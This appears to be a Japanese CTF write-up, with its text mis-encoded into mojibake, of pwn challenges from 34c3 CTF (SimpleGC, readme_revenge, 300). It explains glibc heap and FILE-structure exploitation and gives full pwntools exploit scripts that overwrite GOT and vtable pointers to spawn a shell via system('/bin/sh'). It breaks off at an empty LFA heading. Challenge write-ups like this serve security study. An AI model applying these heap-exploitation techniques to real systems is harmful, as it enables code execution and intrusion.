34c3 CTF Write up
ã“ã®è¨˜äº‹ã¯ CTF Advent Calendar 20日目ã«ãªã‚‹äºˆå®šã ã£ãŸè¨˜äº‹ã§ã™ã€‚
大é…刻ã™ã¿ã¾ã›ã‚“。
å°‘ã—å‰ã«34c3 CTFã®éŽåŽ»å•ã‚’解ã„ãŸã®ã§ãã‚Œã®write upã§ã‚‚。
ã„ã‚„æ•°æ—¥å‰ã«ã‚ã£ãŸ35c3 CTFã˜ã‚ƒãーã®ã‹ã‚ˆã¨çªã£è¾¼ã¾ã‚Œãã†ã§ã™ãŒ...12/20ã«åŽ»å¹´ã®éŽåŽ»å•ã‚’終ã‚らã›ã¦æ°—æŒã¡ã‚ˆã35c3ã«å‡ºã‚‹ã¤ã‚‚ã‚ŠãŒã€
OMG... My laptop has just broken!! What the hell... Tomorrow is 35c3 ctf 😱
— ã‚‹ãã™ (@RKX1209) December 27, 2018
ç ”ç©¶ã§ã‚ã‘ã®ã‚ã‹ã‚‰ãªã„命令を発行ã—ã™ãŽã¦ãªãœã‹ãƒ¡ãƒ¢ãƒªãƒã‚¹ã‚¨ãƒ©ãƒ¼ãŒé »å‡ºã™ã‚‹ã‚ˆã†ã«ãªã‚Šãƒ©ãƒƒãƒ—トップ崩壊ã€æ³£ãæ³£ãæ–°ã—ã„物を購入ã—ã¦ä»Šã«è‡³ã‚Šã¾ã™ã€‚ タイミングãŒæ‚ªã™ãŽã‚‹ã€‚
ã¨ã„ã†ã‚ã‘ã§éŽåŽ»å•è§£ã„ãŸãƒã‚°ã ã‘ã§ã‚‚供養ã—ã¦ãŠãã¾ã™ã€‚元々1,2å•ç¨‹åº¦è§£ãã ã‘ã®ã¤ã‚‚ã‚Šã§ã—ãŸãŒã©ã†ã›é…刻ã™ã‚‹ãªã‚‰ã‚‚ã£ã¨è§£ã„ã¦ãŠã“ã†ã¨ã„ã†äº‹ã§pwnã®4/5å•æ–‡ã®é›‘ãªwrite up。 ã‚ã¨1å•ã®pwndb reloadedã¯æœªã ã«1ãƒãƒ¼ãƒ ã—ã‹è§£ã‘ã¦ãªã„マゾゲーãªã®ã§ä»Šã¯æ–念。V9ã¯è¿‘ã„ã†ã¡ã«è§£ãã¤ã‚‚り。
SimpleGC (107 pt)
概è¦
ユーザーã¨ãã®ãƒ¦ãƒ¼ã‚¶ãƒ¼ãŒæ‰€å±žã™ã‚‹ã‚°ãƒ«ãƒ¼ãƒ—を管ç†ã™ã‚‹ãƒ—ãƒã‚°ãƒ©ãƒ 。
ãƒ¦ãƒ¼ã‚¶ãƒ¼ã‚’è¿½åŠ ã™ã‚‹éš›ã€æ‰€å±žã™ã‚‹ã‚°ãƒ«ãƒ¼ãƒ—を指定ã™ã‚‹ã€‚該当グループãŒæ—¢ã«å˜åœ¨ã™ã‚Œã°ãƒã‚¤ãƒ³ã‚¿ã‚’張る。
ç„¡ã‘ã‚Œã°æ–°ãŸã«ã‚°ãƒ«ãƒ¼ãƒ—を作æˆã—ã¦åŒæ§˜ã«ãƒã‚¤ãƒ³ã‚¿ã‚’張る。
0: Add a user 1: Display a group 2: Display a user 3: Edit a group 4: Delete a user 5: Exit Action:
struct user{ int age; char *name; char *group_key; }; struct group{ char *group_key; int member; };
ã¾ãŸåˆ¥ã‚¹ãƒ¬ãƒƒãƒ‰ã§GC(Garbage Collection)ãŒå‹•ä½œã—ã¦ãŠã‚Šã€å®šæœŸçš„ã«ã‚°ãƒ«ãƒ¼ãƒ—リストを走査ã€memberãŒ0ã«ãªã£ãŸã¤ã¾ã‚Šèª°ã‚‚所属ã—ã¦ã„ãªã„グループã¯å‰Šé™¤ã™ã‚‹ã‚ˆã†ã«ãªã£ã¦ã„る。
グループã®memberã¯æ‰€å±žã™ã‚‹ãƒ¦ãƒ¼ã‚¶ãƒ¼ã‚’4. DeleteUser()ã§å‰Šé™¤ã—ãŸéš›ã«ãƒ‡ã‚¯ãƒªãƒ¡ãƒ³ãƒˆã•ã‚Œã‚‹ã‚ˆã†ã«ãªã£ã¦ã„る。ã“ã‚Œã¯ãƒ¦ãƒ¼ã‚¶ãƒ¼ã®group_keyã«ä¸€è‡´ã™ã‚‹ã‚°ãƒ«ãƒ¼ãƒ—å…¨ã¦ã®memberをデクリメントã™ã‚‹ã€‚
3ã®EditGroup()ã§ã‚°ãƒ«ãƒ¼ãƒ—å(group_key)を別åã«å¤‰æ›´ã§ãã‚‹ãŒã€æ–‡å—列ã«å¯¾ã™ã‚‹ãƒãƒªãƒ‡ãƒ¼ã‚·ãƒ§ãƒ³ã¯ç‰¹ã«ç„¡ã„。
ã“れら2点を悪用ã™ã‚‹ã¨ã€
ãã‚Œãžã‚Œ"group_A"ã¨"group_B"ã«æ‰€å±žã™ã‚‹ãƒ¦ãƒ¼ã‚¶ãƒ¼Aã¨Bを作æˆã€‚
A -> "group_A"
B -> "group_B"
EditGroup()ã§"group_B"ã‚’"group_A"ã¨ã„ã†åŒã˜åå‰ã«å¤‰æ›´ã—ã€ãƒ¦ãƒ¼ã‚¶ãƒ¼Aを削除ã™ã‚‹ã¨
A -> "group_A" (member--)
B -> "group_A" (member--)
memberãŒ0ã«ãªã‚ŠGCã«ã‚ˆã£ã¦ä¸¡æ–¹å…±ã‚°ãƒ«ãƒ¼ãƒ—ãŒfreeã•ã‚Œã‚‹ã€‚一方ã§ãƒ¦ãƒ¼ã‚¶ãƒ¼Bã¯å‰Šé™¤ã•ã‚Œã¦ã„ãªã„ãŸã‚
B -> "group_A" (freed)
ã¨ã€ãƒ’ープã«å¯¾ã™ã‚‹ãƒ€ãƒ³ã‚°ãƒªãƒ³ã‚°ãƒã‚¤ãƒ³ã‚¿ãŒå‡ºæ¥ã‚‹ã€‚ã“ã®ãƒ¦ãƒ¼ã‚¶ãƒ¼Bを使用ã™ã‚Œã°Use After FreeãŒç™ºç”Ÿã™ã‚‹ã€‚
残念ãªãŒã‚‰ãƒ’ープ上ã«vtableç‰ã®é–¢æ•°ãƒã‚¤ãƒ³ã‚¿ãŒå˜åœ¨ã—ãªã„ã®ã§ã€ãƒ’ープエクスプãƒã‚¤ãƒˆãƒ†ã‚¯ãƒ‹ãƒƒã‚¯ã‚’考ãˆã‚‹ã®ãŒè‰¯ã•ãã†ã€‚
Tcache Attack
今回ã¯mallocã®ã‚µã‚¤ã‚ºãŒæ¯”較的å°ã•ã„ãŸã‚ãƒãƒ£ãƒ³ã‚¯ã¯å…¨ã¦tcache + fastbinsã§ç®¡ç†ã•ã‚Œã¦ã„る。
3ã®EditGroup()ã«ã‚ˆã£ã¦free済ã¿ã®ãƒãƒ£ãƒ³ã‚¯group_keyを書ãæ›ãˆã‚‹äº‹ã§freeãƒãƒ£ãƒ³ã‚¯ã®fdを書ãæ›ãˆã§ãる。
fdã‚’ä»»æ„ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«æ›¸ãæ›ãˆã¦ã€ãã®å¾Œmallocを実行ã•ã›ã¦ã„ãã¨è©²å½“アドレスã®é ˜åŸŸã‚’使ã£ã¦ãれる。ã“ã‚Œã«ã‚ˆã‚Šä»»æ„ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«ãƒã‚¤ãƒ³ã‚¿ã‚’通ã—ã¦ã‚¢ã‚¯ã‚»ã‚¹å¯èƒ½ã«ãªã‚‹ã€‚
freeãƒãƒ£ãƒ³ã‚¯ã®fd書ãæ›ãˆã¯fastbinsã®å ´åˆmalloc(2)時ã«ã‚»ã‚ュリティãƒã‚§ãƒƒã‚¯ãŒèµ°ã‚Šã€abortã—ã¦ã—ã¾ã†ã€‚
ã¨ã“ã‚ãŒtcacheを使ã†å ´åˆã¯ã“ã®é™ã‚Šã§ã¯ãªã„。 tcacheã¯7スãƒãƒƒãƒˆã—ã‹ãƒãƒ£ãƒ³ã‚¯ã‚’ã‚ャッシュã§ããšè¶³ã‚Šãªããªã£ãŸå ´åˆã¯é€šå¸¸é€šã‚Šfastbinsを使用ã™ã‚‹ã€‚
tcacheãŒè¶³ã‚Šãšfastbinsを使用ã—始ã‚ãŸçŠ¶æ³ã‚’pwndbgã§ç¢ºèªã™ã‚‹ã¨ä»¥ä¸‹ã®ã‚ˆã†ã«ãªã‚‹ã€‚
pwndbg> bins tcachebins 0x20 [ 5]: 0x1db85c0 —▸ 0x1db8540 —▸ 0x1db84c0 —▸ 0x1db8440 —▸ 0x1db83c0 ◂— ... fastbins 0x20: 0x1db8610 —▸ 0x1db85f0 —▸ 0x1db8590 —▸ 0x1db8570 —▸ 0x1db8510 ◂— ... 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty
ã•ã¦ã€ã“ã®å¾Œmallocを発行ã—ã¦tcacheã«ç©ºããŒå‡ºæ¥ã‚‹ã¨ã©ã†ãªã‚‹ã‹ã¨è¨€ã†ã¨fastbinsã‹ã‚‰tcacheã«ç§»å‹•ã•ã›ã¦ã€æ¬¡å›žã®mallocã«å‚™ãˆã‚‹ã‚ˆã†ã«ãªã‚‹ã€‚
å•é¡Œã¯ã“ã®ç§»å‹•ã®å‡¦ç†ãŒç™ºç”Ÿã—ãŸå ´åˆfastbinsã®ã‚»ã‚ュリティãƒã‚§ãƒƒã‚¯ãŒèµ°ã‚‰ãªã„事ã 。
3585 #if USE_TCACHE 3586 /* While we're here, if we see other chunks of the same size, 3587 stash them in the tcache. */ 3588 size_t tc_idx = csize2tidx (nb); 3589 if (tcache && tc_idx < mp_.tcache_bins) 3590 { 3591 mchunkptr tc_victim; 3592 3593 /* While bin not empty and tcache not full, copy chunks over. */ 3594 while (tcache->counts[tc_idx] < mp_.tcache_count 3595 && (pp = *fb) != NULL) 3596 { 3597 REMOVE_FB (fb, tc_victim, pp); 3598 if (tc_victim != 0) 3599 { 3600 tcache_put (tc_victim, tc_idx); 3601 } 3602 } 3603 } 3604 #endif
ã¤ã¾ã‚Šãƒãƒ£ãƒ³ã‚¯ã®fdを改竄ã—ã¦ã‚‚ã€fastbinsã‹ã‚‰ç›´æŽ¥å–å¾—ã™ã‚‹ã®ã§ã¯ãªãtcacheを一旦通ã›ã°ã™ã‚“ãªã‚Šmallocã§ãã¦ã—ã¾ã†ã€‚
ãŸã ã—今回注æ„ã—ãªã‘ã‚Œã°ãªã‚‰ãªã„ã®ã¯ã‚¹ãƒ¬ãƒƒãƒ‰ãŒãƒ¡ã‚¤ãƒ³(以下T1)ã¨GC用(以下T2)ã®2ã¤ã‚ã‚Šã€arenaã¨tcacheãŒ2ã¤ã‚ã‚‹ã¨ã„ã†äº‹ã€‚
mallocã™ã‚‹ã®ã¯ãƒ¡ã‚¤ãƒ³ã‚¹ãƒ¬ãƒƒãƒ‰å´ã§freeã™ã‚‹ã®ã¯GCå´ãªã®ã§ã€ãã‚Œãžã‚Œã‚¢ã‚¯ã‚»ã‚¹ã™ã‚‹tcacheãŒé•ã†ã€‚
ダングリングãƒã‚¤ãƒ³ã‚¿ã«ã‚ˆã£ã¦æ±šæŸ“ã™ã‚‹ãƒãƒ£ãƒ³ã‚¯ã¯T2ã®tcacheã«ã‚ã‚‹ãŸã‚ã€T1å´ã§mallocã—ã¦ã‚‚汚染ãƒãƒ£ãƒ³ã‚¯ã‚’å–å¾—ã•ã›ã‚‹äº‹ãŒã§ããªã„。
基本的ã«ã¯
"ã‚るスレッドã§mallocã—ãŸé ˜åŸŸã‚’ã€åˆ¥ã®ã‚¹ãƒ¬ãƒƒãƒ‰ã§freeã—ã¦ã‚‚該当ãƒãƒ£ãƒ³ã‚¯ã¯mallocã—ãŸå´ã®ã‚¹ãƒ¬ãƒƒãƒ‰ã®freeリストã«ç¹‹ãŒã‚Œã‚‹"ãŒæˆã‚Šç«‹ã¤ã€‚ãªãœãªã‚‰freeã•ã‚Œã‚‹ã‚¢ãƒ‰ãƒ¬ã‚¹ã¨arenaã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«ã¯arena == (1M align of free addr)ã¨ã„ã†é–¢ä¿‚ãŒæˆã‚Šç«‹ã¤ã‹ã‚‰ã 。
ã¤ã¾ã‚ŠT1ã§mallocã—ãŸã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’ã©ã®ã‚¹ãƒ¬ãƒƒãƒ‰ã§freeã—ãŸå ´åˆã§ã‚‚ã€arenaã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯T1ã®ç‰©ã«è¨ˆç®—ã•ã‚Œã‚‹ã€‚
以下スライド(74p)å‚ç…§
www.slideshare.net
ã—ã‹ã—ãªãŒã‚‰tcacheã ã‘ã¯ä¸Šè¨˜ã®ä¾‹å¤–ã§T1ã§mallocã—ã¦ã‚‚T2ã§freeã™ã‚Œã°T2å´ã®arenaã®tcacheã«ä¿å˜ã•ã‚Œã‚‹ã€‚
よã£ã¦ã‚¨ã‚¯ã‚¹ãƒ—ãƒã‚¤ãƒˆã¯ä»¥ä¸‹ã®ã‚ˆã†ãªæ‰‹é †ã«ãªã‚‹ã€‚
1. T2å´ã§freeã‚’7回以上行ã£ã¦tcacheを使ã„切る。
2. fastbinsã«æº¢ã‚ŒãŸãƒãƒ£ãƒ³ã‚¯ã®fdã‚’dangling pointerã§æ”¹ç«„(fastbinsã¯T1ã¨T2ã§å…±é€š)
3. T1å´ã§mallocを数回行ã„tcacheを枯渇ã•ã›æ”¹ã–ã‚“ã—ãŸfastbinsã‚’tcacheã«è¼‰ã›ã‚‹
ã“ã‚Œã§T1上ã§fake chunkã§mallocãŒå¯èƒ½ã¨ãªã‚‹ã€‚今回ã¯ã“れをuser[0]ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«æ”¹ç«„。
group_key = malloc()を実行ã•ã›ã‚‹ã¨group_key == &user[0]ã¨ãªã‚Šã€å¾Œã¯group_keyを通ã—ã¦
user[0]を改竄ã™ã‚‹ã€‚
pwndbg> x/10xg $users 0x6020e0: 0x0068732f6e69622f 0x00000000006020e0 <-- "/bin/sh\0" ; user[0] 0x6020f0: 0x0000000000602018 0x0000000000000000 <-- free@GOT
ã“ã®å¾Œuser[0]->group_keyã‚’EditGroup()ã§systemã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«æ›¸ãæ›ãˆã‚‹ã¨ã€free@GOTãŒsystemã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«æ›¸ãæ›ã‚る。
ãã®å¾ŒDeleteUser(0)ã§free(user[0]->name)ãŒå®Ÿè¡Œã•ã‚Œsystem("/bin/sh")ã§ã‚·ã‚§ãƒ«ãŒå–れる。
ヒープã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯freeãƒãƒ£ãƒ³ã‚¯ã®fdをリークã•ã›ã‚‹äº‹ã§è¨ˆç®—ã§ãる。
libcã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯freeãƒãƒ£ãƒ³ã‚¯ãŒ1ã¤ã®ã¿ã®éš›ã€fdãŒarena内ã®ãƒ¡ãƒ³ãƒã‚’指ã—ã¦ã„ã‚‹ãŸã‚ã“ã®å€¤ã‹ã‚‰è¨ˆç®—ã§ãる。
Exploit
from pwn import * if len(sys.argv) <= 1: io = process('./sgc') else: # io = remote('', ) exit(0) def add_user(name, group, age): io.recvuntil("Action:") io.sendline("0") io.recvuntil("name:") io.sendline(name) io.recvuntil("group:") io.sendline(group) io.recvuntil("age:") io.sendline(str(age)) def disp_group(group): io.recvuntil("Action:") io.sendline("1") io.recvuntil("name:") io.sendline(group) def disp_user(idx): io.recvuntil("Action:") io.sendline("2") io.recvuntil("index:") io.sendline(str(idx)) return io.recvuntil("0:") def edit_group(idx, prop, group): io.recvuntil("Action:") io.sendline("3") io.recvuntil("index:") io.sendline(str(idx)) io.recvuntil("(y/n):") io.sendline(prop) io.recvuntil("name:") io.sendline(group) def del_user(idx): io.recvuntil("Action:") io.sendline("4") io.recvuntil("index:") io.sendline(str(idx)) user_ptr = 0x6020e0 free_got_ptr = 0x602018 # For filling 7 slots of tcache for i in range(4): add_user("dummy", str(i), 0) # Create 2 users which'll be placed in fastbins add_user("innocent", "normal", 0) add_user("exp", "expg", 0) # Same group name "expg" edit_group(4, "y", "expg") # Free all group (idx 5 dangling ptr) for i in range(5): del_user(i) sleep(1) raw_input() heap_base = u32(disp_user(5)[26:29].ljust(4,'\0'))-0x590 print "heap_base = " + hex(heap_base) edit_group(5, "y", p64(user_ptr-0x10)) # Same group name "expg" edit_group(5, "n", "pad1") edit_group(5, "n", "pad2") edit_group(5, "n", "pad3") # age name group payload = "/bin/sh\0" + p64(user_ptr) + p64(free_got_ptr) edit_group(5,"n",payload) libc_base = u64(disp_user(1)[30:36].ljust(8,'\0')) - 0x97950 system = libc_base+0x4f440 print "libc_base= " + hex(libc_base) print "system= " + hex(system) edit_group(1,"y",p64(system)) del_user(1) io.interactive() #raw_input()
readme_revenge (150 pt)
概è¦
static linkã•ã‚ŒãŸãƒã‚¤ãƒŠãƒªã§ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã®ãƒãƒƒãƒ•ã‚¡ã«æ–‡å—を入力(scanf)ã—出力(printf)ã™ã‚‹ã ã‘。ã—ã‹ã—入力文å—æ•°ã«åˆ¶é™ã‚’書ã‘ã¦ã„ãªã„ã®ã§ãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ã™ã‚‹ã€‚
ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°(0x006b73e0)より下ã«ä½•ãŒã‚ã‚‹ã‹èª¿æŸ»ã—ã¦ã¿ã‚‹ã¨ã€
$ nm --numeric-sort ./readme_revenge
00000000006b7978 B __libc_argc
00000000006b7980 B __libc_argv
00000000006b7988 B __gconv_modules_db
00000000006b7990 B __gconv_lock
00000000006b7998 B __gconv_alias_db
00000000006b79a0 B __gconv_path_envvar
00000000006b79a8 B __gconv_max_path_elem_len
00000000006b79b0 B __gconv_path_elem
00000000006b79c0 B _nl_locale_file_list
00000000006b7a28 B __printf_function_table
00000000006b7a30 B __printf_modifier_table
00000000006b7a38 B __tzname_cur_max
__libc_argvãŒã‚ã‚Šã€ã‹ã¤æ—¢ã«ãƒã‚¤ãƒŠãƒªå†…ã«ãƒ•ãƒ©ã‚°ãŒåŸ‹ã‚è¾¼ã¾ã‚Œã¦ã„ã‚‹ãŸã‚argv[0] leakã§ãƒ•ãƒ©ã‚°ã¯è¡¨ç¤ºã§ããã†ã 。
$ strings -tx ./readme_revenge | grep 34C3 b4040 34C3_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
若干エスパーè¦ç´ ãŒå¼·ã„æ°—ãŒã™ã‚‹ãŒã€argv[0] leakã®å¯èƒ½æ€§ã‚’考慮ã™ã‚‹æ™‚ã¯åå°„çš„ã«strings -txã—ã¦ã¿ã‚‹ç™–ã¨ã‹ä»˜ã‘ã¦ãŠã„ãŸã»ã†ãŒè‰¯ã„ã®ã‹ã€‚
ã•ã¦ã€ä»Šå›žã®é›£ç‚¹ã¯__libc_argvをフラグã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«æ›¸ãæ›ãˆã¦ã‚‚ã‚¹ã‚¿ãƒƒã‚¯ç ´å£ŠãŒèµ·ããªã„ã®ã§fortify_failãŒå‘¼ã°ã‚Œãªã„点ã 。
ã—ã‹ã—ã©ã†ã‚„らã€printfã®å®Ÿè£…を調査ã™ã‚‹ã¨ä¸€å®šæ¡ä»¶ä¸‹ã§__printf_arginfo_tableを実行ã—ã¦ãれる処ç†ãŒã‚るらã—ã„。
if (__builtin_expect (__printf_function_table == NULL, 1) || spec->info.spec > UCHAR_MAX || __printf_arginfo_table[spec->info.spec] == NULL /* We don't try to get the types for all arguments if the format uses more than one. The normal case is covered though. If the call returns -1 we continue with the normal specifiers. */ || (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec]) (&spec->info, 1, &spec->data_arg_type, &spec->size)) < 0) {
ifæ–‡ã®æ¡ä»¶ã¯__printf_function_table != NULLã§__printf_arginfo_tableを調整ã™ã‚Œã°ä»»æ„ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’callã§ãる。
ã“ã‚Œã§fortify_failを呼ã¹ã°è‰¯ã„。
Exploit
from pwn import * import sys if len(sys.argv) <= 1: io = process('./readme_revenge') else: #io = remote('') exit(0) def pad(length): return "\x00" * length name_addr = 0x6b73e0 libc_argv = 0x6b7980 call_fortify = 0x43599b flag_addr = 0x6b4040 printf_func = 0x6b7a28 printf_arg = 0x6b7aa8 payload = p64(flag_addr) payload += pad(ord("s") * 8 - len(payload)) # %s offset payload += p64(call_fortify) payload += pad(libc_argv - name_addr - len(payload)) payload += p64(name_addr) # **_libc_argv payload += pad(printf_func - name_addr - len(payload)) payload += p64(0x1) #__printf_function_table payload += pad(printf_arg - name_addr - len(payload)) payload += p64(name_addr) # __printf_arginfo_table io.sendline(payload) io.interactive()
300 (264 pt)
概è¦
0x300ãƒã‚¤ãƒˆå˜ä½ã®ã‚¹ãƒãƒƒãƒˆã‚’確ä¿/解放/èªã¿æ›¸ãã§ãるプãƒã‚°ãƒ©ãƒ 。
1) alloc 2) write 3) print 4) free
slots[slot] = malloc(0x300); read(0, slotss[slot], 0x300); write(1, slots[slot], strlen(slot)); free(slots[slot]);
ã‚るスãƒãƒƒãƒˆã«å¯¾ã—ã¦freeã—ãŸå¾Œread/writeãŒå¯èƒ½ãªã®ã§UAF(Use After Free)ãŒå‡ºæ¥ã‚‹ã€‚
House of Orange
libc2.24ã§å‹•ä½œã™ã‚‹ãŸã‚tcacheã¯ãªã„。
0x300ãƒã‚¤ãƒˆã®freeãƒãƒ£ãƒ³ã‚¯ã¯fastbinsã§ã¯ãªãunsorted binsã‹small binsã«ç¹‹ãŒã‚Œã‚‹ã€‚
無論ヒープ上ã«vtableã®ã‚ˆã†ãªé–¢æ•°ãƒã‚¤ãƒ³ã‚¿ã‚‚ãªãã€ã¾ãŸSimpleGCã®æ™‚ã®ã‚ˆã†ã«ãƒ’ープ上ã®ãƒã‚¤ãƒ³ã‚¿(key_slot)を通ã—ãŸèªã¿æ›¸ãã‚‚ã§ããªã„。
ã¤ã¾ã‚Šã“ã®ãƒã‚¤ãƒŠãƒªç‹¬è‡ªã®ãƒã‚¸ãƒƒã‚¯ã®ä¸ã§PC制御やAAR/Wã«å¿œç”¨ã§ãã‚‹è¦ç´ ã¯ã»ã¼ç„¡ã„。
ã“ã†ã„ã£ãŸçŠ¶æ³ã§è€ƒãˆã‚‰ã‚Œã‚‹ã®ã¯File Stream Pointer Attackã®ã‚ˆã†ã«
glibcã®æŒã£ã¦ã„る関数ãƒã‚¤ãƒ³ã‚¿(FILE vtalbe)を書ãæ›ãˆã‚‹äº‹ã§PCを制御ã™ã‚‹æ–¹æ³•ã§ã‚る。
ã§ã¯AAWã¯ã©ã†ã™ã‚‹ã‹ã€‚実ã¯unsorted binã«ç¹‹ãŒã‚ŒãŸfreeãƒãƒ£ãƒ³ã‚¯ã‚’利用ã™ã‚‹ã¨unsorted bin attackã«ã‚ˆã£ã¦ä»»æ„ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«å¯¾ã—ã¦é™å®šçš„ãªå€¤ã‚’書ã込む事ãŒå‡ºæ¥ã‚‹ã€‚
ã“ã‚Œã¯malloc時ã€unsorted binã‹ã‚‰freeãƒãƒ£ãƒ³ã‚¯ã‚’å–å¾—ã™ã‚‹å ´åˆã«unlinkã®ã‚»ã‚ュリティãƒã‚§ãƒƒã‚¯ãŒå‹•ã‹ãªã„事を利用ã—ãŸunlink attackã§ã€
for (;; ) 3504 { 3505 int iters = 0; 3506 while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) 3507 { 3508 bck = victim->bk; ... 3513 size = chunksize (victim); ... 3551 /* remove from unsorted list */ 3552 unsorted_chunks (av)->bk = bck; 3553 bck->fd = unsorted_chunks (av); 3554
unsorted bin上ã§fake chunkを作りã€ä¸Šè¨˜ã®bck->fdã‚’ä»»æ„ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«è¨å®šã™ã‚‹ã¨
bck->fd = unsorted_chunks (av);
ã«ã‚ˆã‚Šã€è©²å½“アドレスã«å¯¾ã—ã¦unsorted_chunks (av)ãŒä»£å…¥ã•ã‚Œã‚‹ã€‚
unsorted_chunks (av)ã¯ã€ãƒãƒ£ãƒ³ã‚¯ãŒ1ã¤ã—ã‹å˜åœ¨ã—ãªã„å ´åˆarena内ã®ãƒ¡ãƒ³ãƒã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«ãªã‚‹ã€‚
ã“れを利用ã—ã¦__IO_list_allã¨ã„ã†glibc内ã®FILEãƒã‚¤ãƒ³ã‚¿ãƒªã‚¹ãƒˆã«unsorted_chunks (av)ã‚’è¨å®šã—ã€
_IO_flush_all_lockpãŒå‘¼ã°ã‚Œã‚‹ã‚¿ã‚¤ãƒŸãƒ³ã‚°ã§__IO_list_all->_chain(ã“ã‚Œã¯unsorted_chunks (av)+0x68 == smallbins[4]->bk)
ã«fakeã®FILEæ§‹é€ ä½“ã‚’è¨å®šã€vtable->__overflowを改ã–ã‚“ã™ã‚‹äº‹ã§ä»»æ„アドレス実行を促ã™äº‹ãŒã§ãる。
ã„ã‚ゆるHouse of OrangeãŒä½¿ç”¨ã§ãる。
Understanding the house of orange [study] | 1ce0ear
ãŸã ã—ã“ã®å•é¡Œã¯glibc2.24を使用ã—ã¦ãŠã‚Šã€FILE streaming pointer attackã®å¯¾ç–ãŒæ–½ã•ã‚Œã¦ã„る。ã“ã‚Œã¯vtableã®é–¢æ•°ãƒã‚¤ãƒ³ã‚¿ãŒ
æ£è¦ã®__libc_IO_vtablesセクション内ã«ã‚る関数ã®ã¿ã‚’指ã—ã¦ã„ã‚‹ã‹ãƒã‚§ãƒƒã‚¯ã™ã‚‹æ©Ÿèƒ½ã§ã€ã¤ã¾ã‚Šå¾“æ¥ã®House of Orangeã®ã‚ˆã†ã«
vtable->overflowã‚’system関数ãªã©ã®æ£è¦ã®ã‚»ã‚¯ã‚·ãƒ§ãƒ³å¤–ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«æ›¸ãæ›ãˆã‚‹ã¨abortã—ã¦ã—ã¾ã†ã¨ã„ã†ã‚‚ã®ã 。
ã—ã‹ã—実ã¯ã‚»ã‚¯ã‚·ãƒ§ãƒ³å†…ã®é–¢æ•°ã‚’利用ã—ã¦ã‚‚House of Orangeã‚’è¡Œã†äº‹ã‚‚ã§ãる。例ãˆã°_IO_wstr_finishã¯__libc_IO_vtablesセクション内ã«
å˜åœ¨ã™ã‚‹æ£è¦ã®é–¢æ•°ã§ã‚ã‚‹ãŒã€
325 void 326 _IO_wstr_finish (_IO_FILE *fp, int dummy) 327 { 328 if (fp->_wide_data->_IO_buf_base && !(fp->_flags2 & _IO_FLAGS2_USER_WBUF)) 329 (((_IO_strfile *) fp)->_s._free_buffer) (fp->_wide_data->_IO_buf_base);
fakeã®FILEæ§‹é€ ä½“ã‹ã‚‰_free_bufferã¨_IO_buf_baseã®å€¤ã‚’è¨å®šã™ã‚Œã°system("/bin/sh")を呼ã¶ã“ã¨ãŒã§ãる。
ã¤ã¾ã‚Šã„ããªã‚Šsystem関数を呼ã¶ã®ã§ã¯ãªãã€ä¸€æ—¦æ£è¦ã®é–¢æ•°ã¸ã®å‘¼ã³å‡ºã—を挟む事ã§vtableãƒã‚§ãƒƒã‚¯ã¯ãƒã‚¤ãƒ‘スã§ãる。
Exploit
from pwn import * import sys #stack 0x5c DEBUG=0 if len(sys.argv) <= 1: io = process('./300') SYSTEM = 0x45390 IO_LIST_ALL = 0x3c5520 IO_WSTR_FINISH = 0x3c3030 if DEBUG == 1: gdb.attach(io, 'b *main\n') else: # io = remote('', ) pass def alloc(idx): io.sendafter("4) free\n", "1") io.recvline() io.sendline(str(idx)) def free(idx): io.sendafter("4) free\n", "4") io.recvline() io.sendline(str(idx)) def write(idx, val): io.sendafter("4) free\n", "2") io.recvline() io.sendline(str(idx)) io.send(val) def read(idx): io.sendafter("4) free\n", "3") io.recvline() io.sendline(str(idx)) return io.recvline() alloc(0) alloc(1) alloc(2) alloc(3) alloc(4) free(1) libc_fwdptr = u64(read(1).split('\n')[0].ljust(8, '\x00')) libc_base = libc_fwdptr - 0x3c4b78 system = libc_base + SYSTEM io_list_all = libc_base + IO_LIST_ALL io_wstr_finish = libc_base + IO_WSTR_FINISH print "libc_base=" + hex(libc_base) print "IO_wstr_finish=" + hex(io_wstr_finish) free(3) fake_chunk = u64(read(3).split('\n')[0].ljust(8, '\x00')) print "fake_chunk=" + hex(fake_chunk) free(0) free(2) free(4) alloc(0) alloc(1) # fake_chunk(1) free(0) write(0, fit({8:p64(fake_chunk+0x10)})) # fake_chunk(1) <- 0 alloc(3) # fake_chunk(1) (Remove 0) write(1, fit({ 0:'/bin/sh\x00', 8:p64(0x61), 24:p64(fake_chunk + 0x30), ## fake chunk 0x310 size 40:p64(0x311), ## fake chunk 0x310 bk -> hijacks _IO_list_all 56:p64(io_list_all - 0x10), ## satisfy _IO_flush_all_lockp conditions on 2nd iteration 32:p64(0), # fp->_chain->_mode 192:p64(0), # fp->_chain->_IO_write_base ## make it jump to _IO_wstr_finish 216:p64(io_wstr_finish-0x18), # fp->_chain->vtable ## fake _wide_data 128: p64(fake_chunk + 0x98), 176: p64(fake_chunk + 0x10), # _wide_data->_IO_buf_base "/bin/sh" ## satisfy condition of _IO_wstr_finish 160:p64(fake_chunk + 0x90), # fp->_chain->_wide_data 232:p64(system),})) alloc(3) raw_input() io.sendafter("4) free\n", "5") io.recvline() io.sendline("999") io.interactive()
LFA (400 pt)
概è¦
